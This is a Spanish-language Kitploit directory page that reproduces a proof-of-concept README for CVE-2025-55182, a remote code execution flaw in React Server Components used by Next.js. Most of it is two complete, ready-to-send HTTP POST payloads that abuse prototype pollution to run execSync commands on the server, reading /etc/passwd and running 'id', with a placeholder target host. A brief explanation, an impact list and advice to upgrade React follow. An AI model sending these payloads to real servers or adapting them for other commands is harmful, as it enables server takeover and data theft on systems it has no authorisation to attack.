Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell_cve-2025-55182 | Kitploit
Herramientas/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

React Server Components RCE - CVE-2025-55182

¡Hola! ¡Espero que estés teniendo un gran día! 😊✨

¿De qué trata esto?

Las versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0 de React Server Components tienen un grave problema de seguridad. Los paquetes react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack están afectados.

El problema ocurre cuando el servidor lee datos de las solicitudes de forma insegura. Los atacantes pueden enviar datos especiales que hacen que el servidor ejecute sus comandos.


Prueba de concepto - Ejemplo de ataque completo

Aquí está la solicitud de ataque completa que muestra el problema. He cambiado los comandos por ejemplos seguros.

Reemplaza target-website.com con el sitio web que estás probando.

Solicitud de ataque #1 - Leer archivo del sistema

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Solicitud de ataque #2 - Comprobar información del usuario

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Explicación sencilla

  1. El servidor lee los datos de la solicitud
  2. Los datos maliciosos pueden engañar al servidor para que ejecute comandos
  3. Los atacantes pueden ejecutar cualquier comando que quieran
  4. Los comandos están ocultos en los datos que enviamos

¿Qué puede pasar?

Los atacantes pueden:

  • Ejecutar cualquier comando en el servidor
  • Leer archivos secretos
  • Tomar el control del servidor
  • Robar todos los datos

Cómo solucionarlo

¡Actualiza React de inmediato! Obtén la última versión donde este problema está solucionado.


Enlaces útiles

  • Herramienta de escaneo oficial
  • Detalles técnicos
  • Aviso de seguridad de Facebook
  • Lista de seguridad de OpenWall
  • Blog oficial de React
  • Aviso de seguridad de Next.js
  • Aviso de actualización de Vercel

¡Cuídate y mantente a salvo! ✨❤️

Descargar herramienta